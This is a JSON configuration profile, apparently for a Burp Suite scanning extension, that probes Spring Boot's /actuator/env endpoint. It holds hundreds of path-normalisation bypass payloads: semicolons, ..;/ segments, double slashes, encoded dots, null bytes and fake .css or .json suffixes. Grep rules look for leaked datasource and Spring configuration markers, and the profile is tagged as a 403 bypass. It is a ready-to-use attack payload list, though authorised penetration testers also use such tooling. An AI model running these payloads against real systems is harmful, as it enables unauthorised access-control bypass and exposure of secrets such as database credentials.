[
  {
    "ProfileName": "Spring_actuator_Bypass",
    "Name": "",
    "Enabled": true,
    "Scanner": 1,
    "Author": "@weujieytt",
    "Payloads": [
      "true,/actuator/env",
      "true,/actuator;/env",
      "true,/actuator../env",
      "true,/actuator..;/env",
      "true,/actuator/env/",
      "true,/actuator;/env/",
      "true,/actuator../env/",
      "true,/actuator..;/env/",
      "true,/actuator/env/..;/",
      "true,/actuator;/env/..;/",
      "true,/actuator../env/..;/",
      "true,/actuator..;/env/..;/",
      "true,/actuator/env%20",
      "true,/actuator;/env%20",
      "true,/actuator../env%20",
      "true,/actuator..;/env%20",
      "true,/actuator/env%09",
      "true,/actuator;/env%09",
      "true,/actuator../env%09",
      "true,/actuator..;/env%09",
      "true,/actuator/env%00",
      "true,/actuator;/env%00",
      "true,/actuator../env%00",
      "true,/actuator..;/env%00",
      "true,/actuator/env.json",
      "true,/actuator;/env.json",
      "true,/actuator../env.json",
      "true,/actuator..;/env.json",
      "true,/actuator/env;.css",
      "true,/actuator;/env;.css",
      "true,/actuator../env;.css",
      "true,/actuator..;/env;.css",
      "true,/actuator/env.css",
      "true,/actuator;/env.css",
      "true,/actuator../env.css",
      "true,/actuator..;/env.css",
      "true,/actuator/env.html",
      "true,/actuator;/env.html",
      "true,/actuator../env.html",
      "true,/actuator..;/env.html",
      "true,/actuator/env?",
      "true,/actuator;/env?",
      "true,/actuator../env?",
      "true,/actuator..;/env?",
      "true,/actuator/env#",
      "true,/actuator;/env#",
      "true,/actuator../env#",
      "true,/actuator..;/env#",
      "true,/actuator/env/.",
      "true,/actuator;/env/.",
      "true,/actuator../env/.",
      "true,/actuator..;/env/.",
      "true,/actuator/env",
      "true,/actuator;/env",
      "true,/actuator../env",
      "true,/actuator..;/env",
      "true,//actuator/env",
      "true,//actuator;/env",
      "true,//actuator../env",
      "true,//actuator..;/env",
      "true,/actuator/env/",
      "true,/actuator;/env/",
      "true,/actuator../env/",
      "true,/actuator..;/env/",
      "true,//actuator/env/",
      "true,//actuator;/env/",
      "true,//actuator../env/",
      "true,//actuator..;/env/",
      "true,/actuator/env/..;/",
      "true,/actuator;/env/..;/",
      "true,/actuator../env/..;/",
      "true,/actuator..;/env/..;/",
      "true,//actuator/env/..;/",
      "true,//actuator;/env/..;/",
      "true,//actuator../env/..;/",
      "true,//actuator..;/env/..;/",
      "true,/actuator/env%20",
      "true,/actuator;/env%20",
      "true,/actuator../env%20",
      "true,/actuator..;/env%20",
      "true,//actuator/env%20",
      "true,//actuator;/env%20",
      "true,//actuator../env%20",
      "true,//actuator..;/env%20",
      "true,/actuator/env%09",
      "true,/actuator;/env%09",
      "true,/actuator../env%09",
      "true,/actuator..;/env%09",
      "true,//actuator/env%09",
      "true,//actuator;/env%09",
      "true,//actuator../env%09",
      "true,//actuator..;/env%09",
      "true,/actuator/env%00",
      "true,/actuator;/env%00",
      "true,/actuator../env%00",
      "true,/actuator..;/env%00",
      "true,//actuator/env%00",
      "true,//actuator;/env%00",
      "true,//actuator../env%00",
      "true,//actuator..;/env%00",
      "true,/actuator/env.json",
      "true,/actuator;/env.json",
      "true,/actuator../env.json",
      "true,/actuator..;/env.json",
      "true,//actuator/env.json",
      "true,//actuator;/env.json",
      "true,//actuator../env.json",
      "true,//actuator..;/env.json",
      "true,/actuator/env;.css",
      "true,/actuator;/env;.css",
      "true,/actuator../env;.css",
      "true,/actuator..;/env;.css",
      "true,//actuator/env;.css",
      "true,//actuator;/env;.css",
      "true,//actuator../env;.css",
      "true,//actuator..;/env;.css",
      "true,/actuator/env.css",
      "true,/actuator;/env.css",
      "true,/actuator../env.css",
      "true,/actuator..;/env.css",
      "true,//actuator/env.css",
      "true,//actuator;/env.css",
      "true,//actuator../env.css",
      "true,//actuator..;/env.css",
      "true,/actuator/env.html",
      "true,/actuator;/env.html",
      "true,/actuator../env.html",
      "true,/actuator..;/env.html",
      "true,//actuator/env.html",
      "true,//actuator;/env.html",
      "true,//actuator../env.html",
      "true,//actuator..;/env.html",
      "true,/actuator/env?",
      "true,/actuator;/env?",
      "true,/actuator../env?",
      "true,/actuator..;/env?",
      "true,//actuator/env?",
      "true,//actuator;/env?",
      "true,//actuator../env?",
      "true,//actuator..;/env?",
      "true,/actuator/env#",
      "true,/actuator;/env#",
      "true,/actuator../env#",
      "true,/actuator..;/env#",
      "true,//actuator/env#",
      "true,//actuator;/env#",
      "true,//actuator../env#",
      "true,//actuator..;/env#",
      "true,/actuator/env/.",
      "true,/actuator;/env/.",
      "true,/actuator../env/.",
      "true,/actuator..;/env/.",
      "true,//actuator/env/.",
      "true,//actuator;/env/.",
      "true,//actuator../env/.",
      "true,//actuator..;/env/.",
      "true,/actuator/env",
      "true,/actuator;/env",
      "true,/actuator../env",
      "true,/actuator..;/env",
      "true,//actuator/env",
      "true,//actuator;/env",
      "true,//actuator../env",
      "true,//actuator..;/env",
      "true,/./actuator/env",
      "true,/./actuator;/env",
      "true,/./actuator../env",
      "true,/./actuator..;/env",
      "true,/actuator/env/",
      "true,/actuator;/env/",
      "true,/actuator../env/",
      "true,/actuator..;/env/",
      "true,//actuator/env/",
      "true,//actuator;/env/",
      "true,//actuator../env/",
      "true,//actuator..;/env/",
      "true,/./actuator/env/",
      "true,/./actuator;/env/",
      "true,/./actuator../env/",
      "true,/./actuator..;/env/",
      "true,/actuator/env/..;/",
      "true,/actuator;/env/..;/",
      "true,/actuator../env/..;/",
      "true,/actuator..;/env/..;/",
      "true,//actuator/env/..;/",
      "true,//actuator;/env/..;/",
      "true,//actuator../env/..;/",
      "true,//actuator..;/env/..;/",
      "true,/./actuator/env/..;/",
      "true,/./actuator;/env/..;/",
      "true,/./actuator../env/..;/",
      "true,/./actuator..;/env/..;/",
      "true,/actuator/env%20",
      "true,/actuator;/env%20",
      "true,/actuator../env%20",
      "true,/actuator..;/env%20",
      "true,//actuator/env%20",
      "true,//actuator;/env%20",
      "true,//actuator../env%20",
      "true,//actuator..;/env%20",
      "true,/./actuator/env%20",
      "true,/./actuator;/env%20",
      "true,/./actuator../env%20",
      "true,/./actuator..;/env%20",
      "true,/actuator/env%09",
      "true,/actuator;/env%09",
      "true,/actuator../env%09",
      "true,/actuator..;/env%09",
      "true,//actuator/env%09",
      "true,//actuator;/env%09",
      "true,//actuator../env%09",
      "true,//actuator..;/env%09",
      "true,/./actuator/env%09",
      "true,/./actuator;/env%09",
      "true,/./actuator../env%09",
      "true,/./actuator..;/env%09",
      "true,/actuator/env%00",
      "true,/actuator;/env%00",
      "true,/actuator../env%00",
      "true,/actuator..;/env%00",
      "true,//actuator/env%00",
      "true,//actuator;/env%00",
      "true,//actuator../env%00",
      "true,//actuator..;/env%00",
      "true,/./actuator/env%00",
      "true,/./actuator;/env%00",
      "true,/./actuator../env%00",
      "true,/./actuator..;/env%00",
      "true,/actuator/env.json",
      "true,/actuator;/env.json",
      "true,/actuator../env.json",
      "true,/actuator..;/env.json",
      "true,//actuator/env.json",
      "true,//actuator;/env.json",
      "true,//actuator../env.json",
      "true,//actuator..;/env.json",
      "true,/./actuator/env.json",
      "true,/./actuator;/env.json",
      "true,/./actuator../env.json",
      "true,/./actuator..;/env.json",
      "true,/actuator/env;.css",
      "true,/actuator;/env;.css",
      "true,/actuator../env;.css",
      "true,/actuator..;/env;.css",
      "true,//actuator/env;.css",
      "true,//actuator;/env;.css",
      "true,//actuator../env;.css",
      "true,//actuator..;/env;.css",
      "true,/./actuator/env;.css",
      "true,/./actuator;/env;.css",
      "true,/./actuator../env;.css",
      "true,/./actuator..;/env;.css",
      "true,/actuator/env.css",
      "true,/actuator;/env.css",
      "true,/actuator../env.css",
      "true,/actuator..;/env.css",
      "true,//actuator/env.css",
      "true,//actuator;/env.css",
      "true,//actuator../env.css",
      "true,//actuator..;/env.css",
      "true,/./actuator/env.css",
      "true,/./actuator;/env.css",
      "true,/./actuator../env.css",
      "true,/./actuator..;/env.css",
      "true,/actuator/env.html",
      "true,/actuator;/env.html",
      "true,/actuator../env.html",
      "true,/actuator..;/env.html",
      "true,//actuator/env.html",
      "true,//actuator;/env.html",
      "true,//actuator../env.html",
      "true,//actuator..;/env.html",
      "true,/./actuator/env.html",
      "true,/./actuator;/env.html",
      "true,/./actuator../env.html",
      "true,/./actuator..;/env.html",
      "true,/actuator/env?",
      "true,/actuator;/env?",
      "true,/actuator../env?",
      "true,/actuator..;/env?",
      "true,//actuator/env?",
      "true,//actuator;/env?",
      "true,//actuator../env?",
      "true,//actuator..;/env?",
      "true,/./actuator/env?",
      "true,/./actuator;/env?",
      "true,/./actuator../env?",
      "true,/./actuator..;/env?",
      "true,/actuator/env#",
      "true,/actuator;/env#",
      "true,/actuator../env#",
      "true,/actuator..;/env#",
      "true,//actuator/env#",
      "true,//actuator;/env#",
      "true,//actuator../env#",
      "true,//actuator..;/env#",
      "true,/./actuator/env#",
      "true,/./actuator;/env#",
      "true,/./actuator../env#",
      "true,/./actuator..;/env#",
      "true,/actuator/env/.",
      "true,/actuator;/env/.",
      "true,/actuator../env/.",
      "true,/actuator..;/env/.",
      "true,//actuator/env/.",
      "true,//actuator;/env/.",
      "true,//actuator../env/.",
      "true,//actuator..;/env/.",
      "true,/./actuator/env/.",
      "true,/./actuator;/env/.",
      "true,/./actuator../env/.",
      "true,/./actuator..;/env/.",
      "true,/actuator/env",
      "true,/actuator;/env",
      "true,/actuator../env",
      "true,/actuator..;/env",
      "true,//actuator/env",
      "true,//actuator;/env",
      "true,//actuator../env",
      "true,//actuator..;/env",
      "true,/./actuator/env",
      "true,/./actuator;/env",
      "true,/./actuator../env",
      "true,/./actuator..;/env",
      "true,/;/actuator/env",
      "true,/;/actuator;/env",
      "true,/;/actuator../env",
      "true,/;/actuator..;/env",
      "true,/actuator/env/",
      "true,/actuator;/env/",
      "true,/actuator../env/",
      "true,/actuator..;/env/",
      "true,//actuator/env/",
      "true,//actuator;/env/",
      "true,//actuator../env/",
      "true,//actuator..;/env/",
      "true,/./actuator/env/",
      "true,/./actuator;/env/",
      "true,/./actuator../env/",
      "true,/./actuator..;/env/",
      "true,/;/actuator/env/",
      "true,/;/actuator;/env/",
      "true,/;/actuator../env/",
      "true,/;/actuator..;/env/",
      "true,/actuator/env/..;/",
      "true,/actuator;/env/..;/",
      "true,/actuator../env/..;/",
      "true,/actuator..;/env/..;/",
      "true,//actuator/env/..;/",
      "true,//actuator;/env/..;/",
      "true,//actuator../env/..;/",
      "true,//actuator..;/env/..;/",
      "true,/./actuator/env/..;/",
      "true,/./actuator;/env/..;/",
      "true,/./actuator../env/..;/",
      "true,/./actuator..;/env/..;/",
      "true,/;/actuator/env/..;/",
      "true,/;/actuator;/env/..;/",
      "true,/;/actuator../env/..;/",
      "true,/;/actuator..;/env/..;/",
      "true,/actuator/env%20",
      "true,/actuator;/env%20",
      "true,/actuator../env%20",
      "true,/actuator..;/env%20",
      "true,//actuator/env%20",
      "true,//actuator;/env%20",
      "true,//actuator../env%20",
      "true,//actuator..;/env%20",
      "true,/./actuator/env%20",
      "true,/./actuator;/env%20",
      "true,/./actuator../env%20",
      "true,/./actuator..;/env%20",
      "true,/;/actuator/env%20",
      "true,/;/actuator;/env%20",
      "true,/;/actuator../env%20",
      "true,/;/actuator..;/env%20",
      "true,/actuator/env%09",
      "true,/actuator;/env%09",
      "true,/actuator../env%09",
      "true,/actuator..;/env%09",
      "true,//actuator/env%09",
      "true,//actuator;/env%09",
      "true,//actuator../env%09",
      "true,//actuator..;/env%09",
      "true,/./actuator/env%09",
      "true,/./actuator;/env%09",
      "true,/./actuator../env%09",
      "true,/./actuator..;/env%09",
      "true,/;/actuator/env%09",
      "true,/;/actuator;/env%09",
      "true,/;/actuator../env%09",
      "true,/;/actuator..;/env%09",
      "true,/actuator/env%00",
      "true,/actuator;/env%00",
      "true,/actuator../env%00",
      "true,/actuator..;/env%00",
      "true,//actuator/env%00",
      "true,//actuator;/env%00",
      "true,//actuator../env%00",
      "true,//actuator..;/env%00",
      "true,/./actuator/env%00",
      "true,/./actuator;/env%00",
      "true,/./actuator../env%00",
      "true,/./actuator..;/env%00",
      "true,/;/actuator/env%00",
      "true,/;/actuator;/env%00",
      "true,/;/actuator../env%00",
      "true,/;/actuator..;/env%00",
      "true,/actuator/env.json",
      "true,/actuator;/env.json",
      "true,/actuator../env.json",
      "true,/actuator..;/env.json",
      "true,//actuator/env.json",
      "true,//actuator;/env.json",
      "true,//actuator../env.json",
      "true,//actuator..;/env.json",
      "true,/./actuator/env.json",
      "true,/./actuator;/env.json",
      "true,/./actuator../env.json",
      "true,/./actuator..;/env.json",
      "true,/;/actuator/env.json",
      "true,/;/actuator;/env.json",
      "true,/;/actuator../env.json",
      "true,/;/actuator..;/env.json",
      "true,/actuator/env;.css",
      "true,/actuator;/env;.css",
      "true,/actuator../env;.css",
      "true,/actuator..;/env;.css",
      "true,//actuator/env;.css",
      "true,//actuator;/env;.css",
      "true,//actuator../env;.css",
      "true,//actuator..;/env;.css",
      "true,/./actuator/env;.css",
      "true,/./actuator;/env;.css",
      "true,/./actuator../env;.css",
      "true,/./actuator..;/env;.css",
      "true,/;/actuator/env;.css",
      "true,/;/actuator;/env;.css",
      "true,/;/actuator../env;.css",
      "true,/;/actuator..;/env;.css",
      "true,/actuator/env.css",
      "true,/actuator;/env.css",
      "true,/actuator../env.css",
      "true,/actuator..;/env.css",
      "true,//actuator/env.css",
      "true,//actuator;/env.css",
      "true,//actuator../env.css",
      "true,//actuator..;/env.css",
      "true,/./actuator/env.css",
      "true,/./actuator;/env.css",
      "true,/./actuator../env.css",
      "true,/./actuator..;/env.css",
      "true,/;/actuator/env.css",
      "true,/;/actuator;/env.css",
      "true,/;/actuator../env.css",
      "true,/;/actuator..;/env.css",
      "true,/actuator/env.html",
      "true,/actuator;/env.html",
      "true,/actuator../env.html",
      "true,/actuator..;/env.html",
      "true,//actuator/env.html",
      "true,//actuator;/env.html",
      "true,//actuator../env.html",
      "true,//actuator..;/env.html",
      "true,/./actuator/env.html",
      "true,/./actuator;/env.html",
      "true,/./actuator../env.html",
      "true,/./actuator..;/env.html",
      "true,/;/actuator/env.html",
      "true,/;/actuator;/env.html",
      "true,/;/actuator../env.html",
      "true,/;/actuator..;/env.html",
      "true,/actuator/env?",
      "true,/actuator;/env?",
      "true,/actuator../env?",
      "true,/actuator..;/env?",
      "true,//actuator/env?",
      "true,//actuator;/env?",
      "true,//actuator../env?",
      "true,//actuator..;/env?",
      "true,/./actuator/env?",
      "true,/./actuator;/env?",
      "true,/./actuator../env?",
      "true,/./actuator..;/env?",
      "true,/;/actuator/env?",
      "true,/;/actuator;/env?",
      "true,/;/actuator../env?",
      "true,/;/actuator..;/env?",
      "true,/actuator/env#",
      "true,/actuator;/env#",
      "true,/actuator../env#",
      "true,/actuator..;/env#",
      "true,//actuator/env#",
      "true,//actuator;/env#",
      "true,//actuator../env#",
      "true,//actuator..;/env#",
      "true,/./actuator/env#",
      "true,/./actuator;/env#",
      "true,/./actuator../env#",
      "true,/./actuator..;/env#",
      "true,/;/actuator/env#",
      "true,/;/actuator;/env#",
      "true,/;/actuator../env#",
      "true,/;/actuator..;/env#",
      "true,/actuator/env/.",
      "true,/actuator;/env/.",
      "true,/actuator../env/.",
      "true,/actuator..;/env/.",
      "true,//actuator/env/.",
      "true,//actuator;/env/.",
      "true,//actuator../env/.",
      "true,//actuator..;/env/.",
      "true,/./actuator/env/.",
      "true,/./actuator;/env/.",
      "true,/./actuator../env/.",
      "true,/./actuator..;/env/.",
      "true,/;/actuator/env/.",
      "true,/;/actuator;/env/.",
      "true,/;/actuator../env/.",
      "true,/;/actuator..;/env/.",
      "true,/actuator/env",
      "true,/actuator;/env",
      "true,/actuator../env",
      "true,/actuator..;/env",
      "true,//actuator/env",
      "true,//actuator;/env",
      "true,//actuator../env",
      "true,//actuator..;/env",
      "true,/./actuator/env",
      "true,/./actuator;/env",
      "true,/./actuator../env",
      "true,/./actuator..;/env",
      "true,/;/actuator/env",
      "true,/;/actuator;/env",
      "true,/;/actuator../env",
      "true,/;/actuator..;/env",
      "true,/%2e/actuator/env",
      "true,/%2e/actuator;/env",
      "true,/%2e/actuator../env",
      "true,/%2e/actuator..;/env",
      "true,/actuator/env/",
      "true,/actuator;/env/",
      "true,/actuator../env/",
      "true,/actuator..;/env/",
      "true,//actuator/env/",
      "true,//actuator;/env/",
      "true,//actuator../env/",
      "true,//actuator..;/env/",
      "true,/./actuator/env/",
      "true,/./actuator;/env/",
      "true,/./actuator../env/",
      "true,/./actuator..;/env/",
      "true,/;/actuator/env/",
      "true,/;/actuator;/env/",
      "true,/;/actuator../env/",
      "true,/;/actuator..;/env/",
      "true,/%2e/actuator/env/",
      "true,/%2e/actuator;/env/",
      "true,/%2e/actuator../env/",
      "true,/%2e/actuator..;/env/",
      "true,/actuator/env/..;/",
      "true,/actuator;/env/..;/",
      "true,/actuator../env/..;/",
      "true,/actuator..;/env/..;/",
      "true,//actuator/env/..;/",
      "true,//actuator;/env/..;/",
      "true,//actuator../env/..;/",
      "true,//actuator..;/env/..;/",
      "true,/./actuator/env/..;/",
      "true,/./actuator;/env/..;/",
      "true,/./actuator../env/..;/",
      "true,/./actuator..;/env/..;/",
      "true,/;/actuator/env/..;/",
      "true,/;/actuator;/env/..;/",
      "true,/;/actuator../env/..;/",
      "true,/;/actuator..;/env/..;/",
      "true,/%2e/actuator/env/..;/",
      "true,/%2e/actuator;/env/..;/",
      "true,/%2e/actuator../env/..;/",
      "true,/%2e/actuator..;/env/..;/",
      "true,/actuator/env%20",
      "true,/actuator;/env%20",
      "true,/actuator../env%20",
      "true,/actuator..;/env%20",
      "true,//actuator/env%20",
      "true,//actuator;/env%20",
      "true,//actuator../env%20",
      "true,//actuator..;/env%20",
      "true,/./actuator/env%20",
      "true,/./actuator;/env%20",
      "true,/./actuator../env%20",
      "true,/./actuator..;/env%20",
      "true,/;/actuator/env%20",
      "true,/;/actuator;/env%20",
      "true,/;/actuator../env%20",
      "true,/;/actuator..;/env%20",
      "true,/%2e/actuator/env%20",
      "true,/%2e/actuator;/env%20",
      "true,/%2e/actuator../env%20",
      "true,/%2e/actuator..;/env%20",
      "true,/actuator/env%09",
      "true,/actuator;/env%09",
      "true,/actuator../env%09",
      "true,/actuator..;/env%09",
      "true,//actuator/env%09",
      "true,//actuator;/env%09",
      "true,//actuator../env%09",
      "true,//actuator..;/env%09",
      "true,/./actuator/env%09",
      "true,/./actuator;/env%09",
      "true,/./actuator../env%09",
      "true,/./actuator..;/env%09",
      "true,/;/actuator/env%09",
      "true,/;/actuator;/env%09",
      "true,/;/actuator../env%09",
      "true,/;/actuator..;/env%09",
      "true,/%2e/actuator/env%09",
      "true,/%2e/actuator;/env%09",
      "true,/%2e/actuator../env%09",
      "true,/%2e/actuator..;/env%09",
      "true,/actuator/env%00",
      "true,/actuator;/env%00",
      "true,/actuator../env%00",
      "true,/actuator..;/env%00",
      "true,//actuator/env%00",
      "true,//actuator;/env%00",
      "true,//actuator../env%00",
      "true,//actuator..;/env%00",
      "true,/./actuator/env%00",
      "true,/./actuator;/env%00",
      "true,/./actuator../env%00",
      "true,/./actuator..;/env%00",
      "true,/;/actuator/env%00",
      "true,/;/actuator;/env%00",
      "true,/;/actuator../env%00",
      "true,/;/actuator..;/env%00",
      "true,/%2e/actuator/env%00",
      "true,/%2e/actuator;/env%00",
      "true,/%2e/actuator../env%00",
      "true,/%2e/actuator..;/env%00",
      "true,/actuator/env.json",
      "true,/actuator;/env.json",
      "true,/actuator../env.json",
      "true,/actuator..;/env.json",
      "true,//actuator/env.json",
      "true,//actuator;/env.json",
      "true,//actuator../env.json",
      "true,//actuator..;/env.json",
      "true,/./actuator/env.json",
      "true,/./actuator;/env.json",
      "true,/./actuator../env.json",
      "true,/./actuator..;/env.json",
      "true,/;/actuator/env.json",
      "true,/;/actuator;/env.json",
      "true,/;/actuator../env.json",
      "true,/;/actuator..;/env.json",
      "true,/%2e/actuator/env.json",
      "true,/%2e/actuator;/env.json",
      "true,/%2e/actuator../env.json",
      "true,/%2e/actuator..;/env.json",
      "true,/actuator/env;.css",
      "true,/actuator;/env;.css",
      "true,/actuator../env;.css",
      "true,/actuator..;/env;.css",
      "true,//actuator/env;.css",
      "true,//actuator;/env;.css",
      "true,//actuator../env;.css",
      "true,//actuator..;/env;.css",
      "true,/./actuator/env;.css",
      "true,/./actuator;/env;.css",
      "true,/./actuator../env;.css",
      "true,/./actuator..;/env;.css",
      "true,/;/actuator/env;.css",
      "true,/;/actuator;/env;.css",
      "true,/;/actuator../env;.css",
      "true,/;/actuator..;/env;.css",
      "true,/%2e/actuator/env;.css",
      "true,/%2e/actuator;/env;.css",
      "true,/%2e/actuator../env;.css",
      "true,/%2e/actuator..;/env;.css",
      "true,/actuator/env.css",
      "true,/actuator;/env.css",
      "true,/actuator../env.css",
      "true,/actuator..;/env.css",
      "true,//actuator/env.css",
      "true,//actuator;/env.css",
      "true,//actuator../env.css",
      "true,//actuator..;/env.css",
      "true,/./actuator/env.css",
      "true,/./actuator;/env.css",
      "true,/./actuator../env.css",
      "true,/./actuator..;/env.css",
      "true,/;/actuator/env.css",
      "true,/;/actuator;/env.css",
      "true,/;/actuator../env.css",
      "true,/;/actuator..;/env.css",
      "true,/%2e/actuator/env.css",
      "true,/%2e/actuator;/env.css",
      "true,/%2e/actuator../env.css",
      "true,/%2e/actuator..;/env.css",
      "true,/actuator/env.html",
      "true,/actuator;/env.html",
      "true,/actuator../env.html",
      "true,/actuator..;/env.html",
      "true,//actuator/env.html",
      "true,//actuator;/env.html",
      "true,//actuator../env.html",
      "true,//actuator..;/env.html",
      "true,/./actuator/env.html",
      "true,/./actuator;/env.html",
      "true,/./actuator../env.html",
      "true,/./actuator..;/env.html",
      "true,/;/actuator/env.html",
      "true,/;/actuator;/env.html",
      "true,/;/actuator../env.html",
      "true,/;/actuator..;/env.html",
      "true,/%2e/actuator/env.html",
      "true,/%2e/actuator;/env.html",
      "true,/%2e/actuator../env.html",
      "true,/%2e/actuator..;/env.html",
      "true,/actuator/env?",
      "true,/actuator;/env?",
      "true,/actuator../env?",
      "true,/actuator..;/env?",
      "true,//actuator/env?",
      "true,//actuator;/env?",
      "true,//actuator../env?",
      "true,//actuator..;/env?",
      "true,/./actuator/env?",
      "true,/./actuator;/env?",
      "true,/./actuator../env?",
      "true,/./actuator..;/env?",
      "true,/;/actuator/env?",
      "true,/;/actuator;/env?",
      "true,/;/actuator../env?",
      "true,/;/actuator..;/env?",
      "true,/%2e/actuator/env?",
      "true,/%2e/actuator;/env?",
      "true,/%2e/actuator../env?",
      "true,/%2e/actuator..;/env?",
      "true,/actuator/env#",
      "true,/actuator;/env#",
      "true,/actuator../env#",
      "true,/actuator..;/env#",
      "true,//actuator/env#",
      "true,//actuator;/env#",
      "true,//actuator../env#",
      "true,//actuator..;/env#",
      "true,/./actuator/env#",
      "true,/./actuator;/env#",
      "true,/./actuator../env#",
      "true,/./actuator..;/env#",
      "true,/;/actuator/env#",
      "true,/;/actuator;/env#",
      "true,/;/actuator../env#",
      "true,/;/actuator..;/env#",
      "true,/%2e/actuator/env#",
      "true,/%2e/actuator;/env#",
      "true,/%2e/actuator../env#",
      "true,/%2e/actuator..;/env#",
      "true,/actuator/env/.",
      "true,/actuator;/env/.",
      "true,/actuator../env/.",
      "true,/actuator..;/env/.",
      "true,//actuator/env/.",
      "true,//actuator;/env/.",
      "true,//actuator../env/.",
      "true,//actuator..;/env/.",
      "true,/./actuator/env/.",
      "true,/./actuator;/env/.",
      "true,/./actuator../env/.",
      "true,/./actuator..;/env/.",
      "true,/;/actuator/env/.",
      "true,/;/actuator;/env/.",
      "true,/;/actuator../env/.",
      "true,/;/actuator..;/env/.",
      "true,/%2e/actuator/env/.",
      "true,/%2e/actuator;/env/.",
      "true,/%2e/actuator../env/.",
      "true,/%2e/actuator..;/env/."
    ],
    "Encoder": [],
    "UrlEncode": false,
    "CharsToUrlEncode": "",
    "Grep": [
      "true,,JMXConfigurator",
      "true,Or,linked-hash-set",
      "true,Or,spring.datasource",
      "true,Or,spring.cloud",
      "true,Or,org.springframework.boot.loader",
      "true,Or,EnvironmentManager",
      "true,Or,JMImplementation",
      "true,Or,vnd.spring-boot.actuator",
      "true,Or,JMXConfigurator",
      "true,Or,X-Application-Context",
      "true,Or,application/vnd.spring-boot.actuator"
    ],
    "Tags": [
      "All",
      "Directory Fuzz",
      "403Bypass"
    ],
    "PayloadResponse": false,
    "NotResponse": false,
    "TimeOut1": "",
    "TimeOut2": "",
    "isTime": false,
    "contentLength": "",
    "iscontentLength": false,
    "CaseSensitive": false,
    "ExcludeHTTP": false,
    "OnlyHTTP": false,
    "IsContentType": false,
    "ContentType": "",
    "HttpResponseCode": "",
    "NegativeCT": false,
    "IsResponseCode": false,
    "ResponseCode": "",
    "NegativeRC": false,
    "urlextension": "",
    "isurlextension": false,
    "NegativeUrlExtension": false,
    "isHeaderValue": false,
    "sequence": false,
    "NewHeaders": [],
    "MatchType": 1,
    "Scope": 0,
    "RedirType": 0,
    "MaxRedir": 0,
    "requestType": 1,
    "rawRequest": "",
    "payloadPosition": 1,
    "payloadsFile": "",
    "grepsFile": "",
    "IssueName": "Spring_actuator_Bypass",
    "IssueSeverity": "High",
    "IssueConfidence": "Certain",
    "IssueDetail": "\u003cbr\u003ePAYLOAD: \u003cpayload\u003e\u003c/br\u003e\n\n\u003cbr\u003eGREP: \u003cgrep\u003e\u003c/br\u003e",
    "RemediationDetail": "",
    "IssueBackground": "",
    "RemediationBackground": "",
    "Header": [],
    "VariationAttributes": [],
    "InsertionPointType": [
      65,
      64
    ],
    "Scanas": false,
    "Scantype": 0,
    "pathDiscovery": false,
    "changeHttpRequest": false,
    "showIssue": false,
    "changeHttpRequestType": 1
  }
]